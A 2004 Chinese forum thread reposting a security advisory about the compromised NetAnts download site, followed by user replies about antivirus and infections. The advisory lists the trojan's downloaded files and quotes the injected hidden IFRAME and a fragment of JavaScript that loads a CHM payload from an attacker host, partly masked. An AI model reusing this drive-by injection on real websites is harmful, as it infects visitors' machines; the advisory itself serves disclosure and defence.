社区应用 最新帖子 精华区 社区服务 会员列表 统计排行
主题 : [转贴]网络蚂蚁站点遭受入侵修改的紧急通告(A级)
级别: 侠客
显示用户信息 
0  发表于: 2004-04-09   

[转贴]网络蚂蚁站点遭受入侵修改的紧急通告(A级)


哈工大——安天联合Cert小组
入侵事件通告

(2004-04-08-A)

 网络蚂蚁站点遭受入侵修改的紧急通告(A级)


2004年4月8日上午9点,安天Arrect Net预警网络发现著名共享软件网络蚂蚁官方站点包含恶意代码,可能系入侵修改造成,将严重威胁浏览该站的用户系统安全.
由于网络蚂蚁的站点的较大访问量,为此我们定义此次通告为A级。
经验证用户如果访问网络蚂蚁中文站http://www.netants.com/gb,
会被安装木马Trojan.Win32.StartPage.es。 经过对木马分析特点如下:
该木马为PE可执行文件,长度为 6,656 字节

该木马执行后,有如下行为:连接网站http://hard-???????.com(后面做了屏蔽处理,以下同) 并获取若干文件,存放到%windir%下:
网络文件 本地文件
progs/reg33lol.txt reg33.exe
progs/secure1a.php secureb.html
progs/secure64.php securea.html
progs/secure30.php secure.html
progs/mssysadv.txt mssys.exe
progs/mstaskss.txt mstaskss.exe
progs/msstasks.txt msstasks.exe
progs/consol32.txt consol32.exe
progs/toffel32.txt toffel32.exe
progs/dkdial66.txt dlm.html
progs/dkdial33.txt dlm.exe
progs/dkdial64.txt dl.html
progs/dkdial32.txt dl.exe



这些文件包括以下木马程序:
Trojan.Win32.Harnig.b
Trojan.Win32.Harnig.c
Trojan.Win32.Harnig.d
TrojanDownloader.Win32.Donn.b
...
木马文件生成一个cmd32.dll,这个文件将注入记事本程序运行。
其中 TrojanDownloader.Win32.Donn.b 又从http://hard-???????.com下载
/progs/d22/irvk.avi 本地命名为appsys.exe
......


经过对网络蚂蚁中文站页面的简单分析,下面连接怀疑为攻击者添加:


<IFRAME SRC="http://www.forced-??????.com/?d=get" WIDTH=1 HEIGHT=1></IFRAME>

这一修改使网络蚂蚁页面被访问后,会通过了连续的IFRAME SRC打开了多个连接,其中包括:
http://www.forced-??????.com/tool.html
而在tools.html中通过IFRAME SRC打开

http://hard-virgins.com/dl/fox.php
fox.php中执行了一个
<ript language="javascript">
document.write(cxw.value.replace(/ ${PR}/g,'ms-its:mhtml:file://c:
osuch.mht!http://hard-???????.com/dl/fox/x.chm::/x.htm'));
</script>
...

我们将关注此事的进展并进行进一步的分析和支持,我们正在积极与作者取得联系。 在此事得到妥善解决前,我们建议用户不要访问网络蚂蚁网站。改由其他下载站点下载该软件。

KASPERSKY用户如果监控器是开着的,会成功拦截并清除此木马。
级别: 骑士
显示用户信息 
6  发表于: 2004-04-12   
:(
真不给面子阿
级别: 精灵王
显示用户信息 
5  发表于: 2004-04-12   
晚了,已经恢复了。
偶用镜象的,恢复加上配置完成,大楖半小时不到吧。
黑夜给了我黑色的眼睛,我却用它来寻找光明。
想看清这然和所以然,却发现被自己的双眼所蒙蔽。
级别: 骑士
显示用户信息 
4  发表于: 2004-04-11   
我最近去查了许多的资料,很多人都用KASPERSKY杀毒软件啊,

邪眼 斑竹你正好中毒了,不妨用这个软件试试看,回来告诉我们用后感哦:)
级别: 精灵王
显示用户信息 
3  发表于: 2004-04-10   
郁闷,偶的机机中毒了。
同学到我家来,打开了病毒给他的地址。。。。。。在分析中,准备干掉它。
黑夜给了我黑色的眼睛,我却用它来寻找光明。
想看清这然和所以然,却发现被自己的双眼所蒙蔽。
级别: 侠客
显示用户信息 
2  发表于: 2004-04-10   
是病毒防火墙,即杀毒软件。文中提到,KASPERSKY用户如果监控器是开着的,会成功拦截并清除此木马,其他的防病毒软件能否清除不清楚,只要病毒库及时升级,应该问题不大。
级别: 骑士
显示用户信息 
1  发表于: 2004-04-09   
你所提到的是防火墙还是杀毒软件啊??
如果已经中毒了,还用这个软件杀毒可以吗??
描述
快速回复

按"Ctrl+Enter"直接提交